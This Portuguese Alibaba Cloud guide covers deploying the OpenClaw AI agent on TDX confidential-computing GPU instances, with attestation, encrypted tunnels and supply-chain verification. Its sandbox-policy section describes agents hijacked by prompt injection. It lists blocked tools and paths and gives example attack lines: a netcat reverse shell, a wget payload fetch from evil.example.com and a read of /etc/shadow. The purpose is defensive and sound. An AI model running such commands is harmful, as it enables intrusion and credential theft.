Todos os produtos
Search
Central de documentação

Elastic GPU Service:Build an OpenClaw confidential AI agent on heterogeneous confidential computing instances

Última atualização: Jul 04, 2026

Agentes de IA gerenciam conversas com usuários, chamadas a ferramentas externas, memória de longo prazo e credenciais de serviço durante a execução, expondo uma superfície de ataque muito maior que a de aplicações tradicionais. As instâncias heterogêneas de computação confidencial gn8v-tee da Alibaba Cloud utilizam Intel TDX e computação confidencial com GPU NVIDIA para oferecer um ambiente de execução confiável (TEE) completo. Implante o framework de agente de IA open source OpenClaw nessas instâncias para obter proteção de dados no nível de hardware, atestação remota e verificabilidade da cadeia de suprimentos, garantindo segurança de ponta a ponta na inferência de modelos e nas interações com usuários.

Visão geral

A solução Confidential Agent implanta o OpenClaw em instâncias gn8v-tee compatíveis com Intel TDX (Trust Domain Extensions). O modelo Qwen3,6-35B-A3B Mixture of Experts (MoE) roda localmente na instância; assim, a execução do agente e a inferência do modelo permanecem inteiramente dentro do domínio de confiança TDX, sem chamar serviços de API de terceiros. A entrada do usuário, os pesos do modelo, os estados intermediários da inferência e a saída da IA nunca saem do limite de confiança da instância confidencial durante o processamento.

Nota

A gn8v-tee é uma família de instâncias de computação confidencial baseada em GPU lançada pela Alibaba Cloud. Ela integra criptografia de hardware Intel TDX e aceleração por GPU NVIDIA para atender tanto aos requisitos de desempenho de inferência de IA quanto às exigências de conformidade e segurança de dados. Este tópico usa ecs.gn8v-tee.4xlarge como exemplo, executando Alibaba Cloud Linux 3 na zona cn-beijing-l. Para cargas de trabalho maiores, escale horizontalmente para tipos de instância com múltiplas GPUs.

Arquitetura de segurança

Todos os dados essenciais na implantação do Confidential Agent permanecem dentro do limite do TEE. Os três tipos de ativos a seguir têm proteção rigorosa:

Ativo protegido

Descrição

Privacidade da conversa do usuário

Entradas do usuário, contexto de execução de ferramentas e respostas da IA, que podem conter informações sensíveis, como dados pessoais identificáveis (PII), registros médicos e dados financeiros.

Memória e estado do agente

Memória de longo prazo, configurações e arquivos SKILL no OpenClaw, que se tornam alvos de alto valor ao longo do tempo.

Credenciais de serviço

Credenciais OAuth para plataformas de mensagens instantâneas como DingTalk, chaves de API externas e tokens de gateway.

A arquitetura de segurança possui cinco camadas, de baixo para cima: hardware, cadeia de inicialização, runtime, gerenciamento de chaves e comunicação:

Camada de proteção

Mecanismo

Hardware

O Memory Encryption Engine (MEE) do Intel TDX criptografa transparentemente toda a memória do convidado. O provedor de nuvem não consegue ler o texto simples.

Cadeia de inicialização

UKI (Unified Kernel Image) + rootfs dm-verity para proteção contra adulteração. A atestação remota verifica a integridade do runtime. Valores de referência da cadeia de suprimentos são registrados no log de transparência Rekor.

Runtime

O sandbox de política PEP bloqueia comandos de alto risco e acessos a caminhos sensíveis, impedindo escalonamento de privilégios causado por injeção de prompt.

Gerenciamento de chaves

As chaves de criptografia de disco são injetadas por meio de um desafio de atestação remota durante a inicialização e mantidas localmente pelo usuário. O provedor de nuvem não participa desse processo.

Comunicação

Criptografia de ponta a ponta RATS-TLS. O canal criptografado é estabelecido somente após a atestação remota verificar a identidade da instância. Toda a comunicação é criptografada em trânsito.

Fluxo de trabalho de implantação

image
  1. Auditoria do código-fonte: O responsável pela implantação audita o código-fonte do negócio para confirmar a ausência de códigos maliciosos ou backdoors.

  2. Compilação de artefatos e publicação de valores de referência de software: Compile uma imagem leve de SO contendo apenas o serviço OpenClaw a partir do código-fonte auditado e envie a assinatura SLSA dos artefatos compilados para o log de transparência Rekor, publicando assim os valores de referência do software.

  3. Criação de instância confidencial: Crie uma instância de computação confidencial gn8v-tee utilizando a imagem compilada.

  4. Auditoria de atestação remota e upload de recursos confidenciais: Utilize a ferramenta de implantação para realizar a atestação remota na instância e verificar se ela executa em hardware TDX genuíno. Após a verificação, recursos confidenciais, como chaves de criptografia de disco e credenciais de bot do DingTalk, são carregados automaticamente.

  5. Acesso ao OpenClaw: Acesse o OpenClaw diretamente por meio de um navegador web, cliente desktop ou terminal TUI, ou indiretamente por plataformas de mensagens instantâneas como o DingTalk.

  6. Auditoria de atestação remota e transmissão criptografada: Antes de estabelecer uma conexão, o cliente do gateway confiável recupera valores de referência de software do Rekor e valores de referência de hardware do Intel PCCS e RIM/OCSP. Após concluir a verificação de atestação remota, um canal criptografado RATS-TLS é estabelecido. Toda a comunicação é criptografada de ponta a ponta.

Pré-requisitos

  • Ative o Alibaba Cloud ECS e verifique se sua conta tem permissões para criar instâncias gn8v-tee.

  • Prepare uma instância ECS executando Alibaba Cloud Linux 3 (uso geral ou outro tipo) como máquina de implantação, com pelo menos 80 GB de espaço em disco disponível.

    Importante

    A máquina de implantação serve exclusivamente para operações de deploy. Uma instância de uso geral é suficiente; não é necessário usar uma instância gn8v-tee. Nas etapas seguintes, você executará comandos na máquina de implantação para criar a instância gn8v-tee.

  • Obtenha um par de AccessKey da Alibaba Cloud. Recomendamos o uso de uma função RAM ou credenciais temporárias STS.

  • Caso precise usar a integração com DingTalk, crie uma aplicação empresarial interna no DingTalk e obtenha as credenciais necessárias.

Procedimento

Etapa 1: Compilar uma imagem confiável contendo OpenClaw e o mecanismo de inferência vLLM

Execute as tarefas a seguir na máquina de implantação (uma instância Alibaba Cloud Linux 3): baixe o código-fonte, instale dependências, gere chaves, configure recursos de nuvem e compile a imagem confiável.

  1. Faça login em uma instância ECS.

    1. Acesse ECS console - Instances. No canto superior esquerdo, selecione a região e o grupo de recursos da instância de destino.

    2. Acesse a página de detalhes da instância desejada. Clique em Connect e selecione Workbench. Defina o método de conexão como Terminal Connection, insira seu nome de usuário e senha e faça login no terminal gráfico.

  2. Baixe o código-fonte do projeto.

    cd ~/
    git clone https://github.com/inclavare-containers/confidential-agent
    cd confidential-agent
  3. Instale todas as dependências de software necessárias.

    make install-deps

    Este comando instala Docker, Terraform, Go, Python, cosign, rekor-cli e outras ferramentas necessárias para compilação e implantação.

  4. Gere as chaves de criptografia e os arquivos de configuração necessários para a implantação.

    make generate-secrets

    Após a geração das chaves, edite secrets/openclaw-vllm.json e substitua os placeholders pelos valores reais, como credenciais da aplicação DingTalk e configurações do modelo. A tabela a seguir descreve os placeholders:

    Placeholder

    Descrição

    Como obter

    <DINGTALK_BOT_CLIENT_ID>

    ClientId do bot do DingTalk

    Consulte DingTalk Bot + OpenClaw. Crie uma aplicação no Portal do Desenvolvedor DingTalk para obter o valor.

    <DINGTALK_BOT_CLIENT_SECRET>

    ClientSecret do bot do DingTalk

    Mesma fonte acima. Obtenha o valor na página de detalhes da aplicação.

  5. Configure o arquivo de variáveis do Terraform.

    Nota

    O Terraform é uma ferramenta open source de Infraestrutura como Código (IaC) que automatiza a criação, modificação e gestão de versões de recursos e serviços em nuvem na Alibaba Cloud por meio de arquivos de configuração declarativos. Nesta solução, o Terraform automatiza a implantação de instâncias confidenciais.

    cp terraform/terraform.tfvars.example terraform/terraform.tfvars

    Edite o arquivo terraform/terraform.tfvars e configure os parâmetros principais conforme descrito na tabela abaixo.

    Parâmetro

    Valor recomendado

    Descrição

    zone_id

    "cn-beijing-l"

    Zona compatível com a família de instâncias gn8v-tee

    vpc_cidr

    "10.0.0.0/16"

    Bloco CIDR da VPC

    vswitch_cidr

    "10.0.1.0/24"

    Bloco CIDR do vSwitch

    security_group_allowed_cidr

    O bloco CIDR de IP do ambiente cliente que precisa acessar o serviço OpenClaw

    Faixa de IPs de origem permitida pelo grupo de segurança

    Importante

    O valor padrão de security_group_allowed_cidr é 0.0.0.0/0. Em ambientes de produção, altere obrigatoriamente este valor para um bloco CIDR de IP específico, permitindo apenas os endereços IP de origem necessários.

  6. Exporte suas credenciais de acesso da Alibaba Cloud para que o Terraform possa criar recursos em nuvem.

    export ALICLOUD_ACCESS_KEY="<YOUR_ACCESS_KEY>"
    export ALICLOUD_SECRET_KEY="<YOUR_SECRET_KEY>"
    Nota

    Recomendamos utilizar uma função RAM ou credenciais temporárias (STS) para evitar o armazenamento prolongado de pares de AccessKey. Para mais informações sobre como criar um par de AccessKey, consulte Criar um par de AccessKey.

  7. Compile uma imagem confiável contendo o OpenClaw e o mecanismo de inferência vLLM.

    make build PROFILE=openclaw-vllm
    Nota

    A primeira compilação envolve etapas como instalação de drivers de GPU. Aguarde a conclusão do processo.

    Ao final da compilação, duas imagens são geradas:

    Tipo de imagem

    Descrição

    Imagem de produção

    Versão com segurança reforçada, servidor SSH removido e apenas o runtime mínimo mantido, destinada a implantações em produção

    Imagem de depuração

    Mantém acesso SSH e ferramentas de debug, indicada apenas para troubleshooting

    Durante o processo de compilação, os valores de referência da imagem também são enviados ao log de transparência Rekor. Um arquivo de metadados .rekor-meta.json é gerado para verificação durante a implantação.

Etapa 2: Implantar a imagem confiável em uma instância

Implante a imagem confiável em uma instância gn8v-tee e estabeleça um canal criptografado de ponta a ponta via TNG.

  1. Na máquina de implantação, execute o comando abaixo para criar uma instância gn8v-tee usando a imagem confiável. Após a criação, a atestação remota é realizada na instância e os recursos confidenciais são carregados.

    make deploy PROFILE=openclaw-vllm RV_MODE=rekor

    A tabela a seguir descreve os parâmetros principais:

    Parâmetro

    Descrição

    PROFILE=openclaw-vllm

    Perfil de implantação a ser utilizado

    RV_MODE=rekor

    Verifica valores de referência da imagem através do log de transparência Rekor durante a implantação

    A implantação cria os seguintes recursos na nuvem:

    • Bucket OSS: Espaço de armazenamento privado usado para carregar e hospedar a imagem confiável da VM (.qcow2).

    • Imagem personalizada ECS: Importada do arquivo de imagem no OSS para a biblioteca de imagens personalizadas do Alibaba Cloud ECS.

    • Instância de computação confidencial ECS com GPU: Instância de computação confidencial ecs.gn8v-tee.4xlarge anexada ao grupo de segurança e ao vSwitch. Os parâmetros de inicialização UKI incluem a configuração do desafio de atestação remota.

    • Grupo de segurança: Libera SSH (porta 22) e TNG (porta 18789), permitindo acesso apenas do bloco CIDR especificado.

    Nota

    Por padrão, a imagem de Depuração é implantada. Para implantar a imagem de Produção (sem acesso SSH), especifique manualmente o arquivo de imagem.

    Importante

    Durante a implantação, a imagem é carregada no OSS e os modelos são baixados do ModelScope, o que requer acesso à Internet e gera cobranças de tráfego.

  2. Inicie o TNG Client na máquina de implantação para estabelecer um canal criptografado RATS-TLS entre a máquina de implantação e a instância gn8v-tee na nuvem.

    make connect-tng

    Após uma conexão bem-sucedida, a saída exibe as URLs HTTP e WebSocket e o token de acesso para o OpenClaw. Todas as comunicações subsequentes são protegidas por criptografia RATS-TLS.

  3. Verifique se o serviço OpenClaw está pronto através do túnel TNG.

    curl -s http://localhost:18789/health

    Quando um status saudável for retornado, prossiga para acessar o serviço.

Etapa 3: Acessar o serviço OpenClaw protegido por computação confidencial

Com o serviço pronto, acesse o OpenClaw por qualquer um dos quatro métodos a seguir.

Método 1: Via chat do DingTalk

Localize o bot configurado no DingTalk e envie uma mensagem para iniciar uma conversa com o OpenClaw.

image

Método 2: Via interface web no navegador

Preparação: Estabelecer encaminhamento de porta da máquina local para a máquina de implantação

O comando make connect-tng da Etapa 2 executa na máquina de implantação e vincula o túnel TNG a localhost:18789 nessa mesma máquina. Configure o encaminhamento de porta SSH da sua máquina local para a máquina de implantação:

ssh -L 18789:127.0.0.1:18789 root@<deployment machine IP>

Uma vez estabelecido o encaminhamento de porta, acessar localhost:18789 em um navegador ou cliente na sua máquina local equivale a acessar o túnel TNG na máquina de implantação.

Acesso pelo navegador

Com o encaminhamento de porta SSH configurado na sua máquina local, acesse http://localhost:18789/openclaw no navegador para abrir o painel de controle web. Insira o token do OpenClaw obtido na Etapa 2 para acessar o serviço.

image

Método 3: Via cliente desktop OpenClaw

Preparação: Estabelecer encaminhamento de porta da máquina local para a máquina de implantação

O comando make connect-tng da Etapa 2 executa na máquina de implantação e vincula o túnel TNG a localhost:18789 nessa mesma máquina. Configure o encaminhamento de porta SSH da sua máquina local para a máquina de implantação:

ssh -L 18789:127.0.0.1:18789 root@<deployment machine IP>

Uma vez estabelecido o encaminhamento de porta, acessar localhost:18789 em um navegador ou cliente na sua máquina local equivale a acessar o túnel TNG na máquina de implantação.

Acesso pelo cliente desktop

Instale o cliente desktop OpenClaw na sua máquina local, configure o modo remoto, defina o endereço de conexão como ws://localhost:18789 e insira o token do OpenClaw obtido na Etapa 2.

Método 4: Via TUI do OpenClaw

Instale o OpenClaw como cliente na máquina de implantação:

npm install -g openclaw@latest --registry=https://registry.npmmirror.com

Em seguida, execute o comando abaixo na máquina de implantação para iniciar o TUI do OpenClaw e conectar-se à instância remota do OpenClaw:

openclaw tui --url ws://localhost:18789 --token <gateway-token>

Substitua <gateway-token> pelo token de gateway do OpenClaw obtido na Etapa 2.

Nota

Na primeira conexão via TUI, uma mensagem pairing required será exibida. Acesse http://localhost:18789/openclaw no navegador, localize o dispositivo pendente de autorização na página Nodes e clique em Approve para concluir a autorização. Depois, retorne ao TUI.

Após a conclusão da autorização, o TUI estará pronto para conversas:

image

Etapa 4 (opcional): Liberar recursos

Quando o serviço não for mais necessário, execute o comando a seguir para liberar todos os recursos de nuvem:

make destroy PROFILE=openclaw-vllm
Aviso

Esta operação é irreversível e exclui a instância ECS e os recursos de rede associados. Certifique-se de que os dados na instância não são mais necessários antes de executar este comando.

Verificação de segurança

Verificar a confiabilidade do ambiente de runtime

O OpenClaw inclui uma skill integrada tdx-remote-attestation que aciona automaticamente a atestação remota quando perguntas relacionadas à segurança são feitas, verificando o status de segurança do ambiente de runtime atual.

Como acionar: Faça perguntas relacionadas à segurança no DingTalk, Web ou TUI, como "Meus dados estão seguros?" ou "Este ambiente é confiável?".

Conteúdo retornado:

Item de verificação

Descrição

Status de confiança do hardware

Um valor de hardware igual ou inferior a 32 indica aprovação na verificação

Tipo de TEE

Domínio de Confiança Intel TDX

Proteção de criptografia de memória

Confirma que o Memory Encryption Engine está ativado

Integridade da cadeia de inicialização UKI

Verifica a consistência dos valores de medição dos componentes

image (1)

Verificar a aplicação da política PEP

PEP (Policy Enforcement Point) é um mecanismo de controle de runtime para agentes de IA confidenciais. Quando um agente como o OpenClaw executa um comando através da ferramenta exec, a solicitação passa primeiro pelo cai-pep para correspondência de políticas e, em seguida, executa em um sandbox Docker isolado (modo de rede none). Políticas configuráveis impõem restrições obrigatórias às ferramentas disponíveis para o agente, prevenindo riscos de segurança decorrentes de injeção maliciosa de prompts.

O PEP oferece três camadas de proteção:

  1. Bloqueio no nível de comando: Rejeita comandos de alto risco com base em uma lista de bloqueios, como curl, wget, nc, ssh e docker.

  2. Bloqueio no nível de caminho: Impede o acesso a caminhos sensíveis, como /etc, /proc, /root e /home/openclaw/.openclaw.

  3. Isolamento de rede: O sandbox não possui acesso à rede. Mesmo que um comando contorne a lista de bloqueios, ele não conseguirá estabelecer conexões de saída.

O arquivo de política padrão está localizado em ~/confidential-agent/image/customize/files/cai-pep-default-policy.json na máquina de implantação. Modifique a lista de bloqueio de comandos, a lista de bloqueio de caminhos e os limites de recursos antes de compilar a imagem.

Se um agente for comprometido por injeção maliciosa de prompt e um atacante tentar estabelecer um reverse shell ou baixar um payload malicioso, o PEP bloqueará automaticamente essas operações de alto risco:

Método de ataque

Exemplo de comando

Motivo do bloqueio

Reverse shell

nc 10.0.0.99 4444 -e /bin/bash

nc está na lista de bloqueio de comandos

Download de payload malicioso

wget http://evil.example.com/payload.sh

wget está na lista de bloqueio de comandos

Leitura de arquivos sensíveis

cat /etc/shadow

/etc/shadow corresponde ao prefixo de caminho /etc

Verificar a integridade da cadeia de suprimentos

A implantação utiliza o log de transparência Rekor por padrão para armazenar valores de referência de imagem. Durante a atestação remota, os valores de referência são recuperados automaticamente do Rekor para verificação. Audite as entradas do log Rekor para verificar a integridade da cadeia de suprimentos usando os métodos a seguir.

Visualizar registros do Rekor

Após a conclusão da compilação, localize o índice de log e a URL da entrada do registro na máquina de implantação:

cat ~/confidential-agent/image/output/slsa-output-cai-openclaw-vllm-debug-*/rekor-v1-upload.txt

Exemplo de saída:

Created entry at index 1205944956, available at: https://rekor.sigstore.dev/api/v1/log/entries/<uuid>

Verificar prova de inclusão

A prova de inclusão confirma que a entrada contendo valores de referência de imagem existe na Raiz Merkle do log Rekor.

rekor-cli verify --log-index 1205944956 --rekor_server https://rekor.sigstore.dev

Se a saída contiver dois valores de hash idênticos, a verificação foi bem-sucedida:

Computed Root Hash: 1291abcee27148a4c00241ba8719f798ce060e8a5ccc8b18249017c25c6d0090
Expected Root Hash: 1291abcee27148a4c00241ba8719f798ce060e8a5ccc8b18249017c25c6d0090

Verificar prova de consistência

A prova de consistência confirma que uma Raiz Merkle mais antiga (Raiz A) é um prefixo ou estado histórico de uma Raiz Merkle mais recente (Raiz B), garantindo que as entradas de valores de referência armazenadas no Rekor não foram adulteradas ou excluídas.

rekor-cli loginfo --rekor_server https://rekor.sigstore.dev

Se a saída contiver o conteúdo a seguir, a verificação foi bem-sucedida:

Verification Successful!

Configuração do grupo de segurança

Durante a execução do make deploy, regras de grupo de segurança são criadas automaticamente. Caso precise modificar o grupo de segurança posteriormente, certifique-se de que ele contenha as seguintes regras:

Porta

Protocolo

Descrição

Recomendação de segurança

22

TCP

Gerenciamento remoto SSH (apenas imagem de Depuração)

Restrinja o IP de origem à rede de gerenciamento

18789

TCP

Endpoint do túnel TNG (RATS-TLS), usado para acessar o serviço OpenClaw

Restrinja o IP de origem ou acesse via TNG

Importante : Em ambientes de produção, altere obrigatoriamente o security_group_allowed_cidr para um bloco CIDR de IP de gerenciamento específico. Evite usar 0.0.0.0/0 .

Perguntas frequentes

  • Falha no make build por erro de dependência ausente

    Verifique se todas as dependências estão instaladas e se há espaço em disco suficiente:

    make install-deps
    df -h /

    Se isso não resolver o problema, execute make clean-image para limpar artefatos de compilação e recompile.

  • Falha no make deploy com NoSetRoletoECSServiceAcount

    Esse erro indica que a função de importação de imagem ECS não está autorizada. Resolva realizando uma das operações a seguir:

    • Faça login no console da Alibaba Cloud, acesse ECS > Images > Import Image e clique em Authorize para criar a função AliyunECSImageImportDefaultRole.

    • No console RAM, conceda a política AliyunOSSFullAccess à função AliyunECSImageImportDefaultRole.

  • Serviço não responde

    1. Verifique se a imagem de Depuração foi implantada (a imagem de Produção não inclui SSH).

    2. Reimplante e verifique se o make deploy foi concluído sem erros.

    3. Implante a imagem de Depuração e conecte-se via SSH para verificar logs e solucionar o problema.

  • Falha na verificação local do TNG

    Verifique se o contêiner Trustee local está em execução e saudável:

    # Verify the local Trustee container is running
    docker ps | grep cai-local-trustee
    
    # Check Trustee health status
    curl http://127.0.0.1:18081/api/health
    
    # If Trustee is not ready, re-run
    make connect-tng
  • cai-pep rejeita todas as chamadas de ferramentas

    Implante a imagem de Depuração e conecte-se via SSH para verificar os logs do cai-pep e identificar o motivo específico do bloqueio.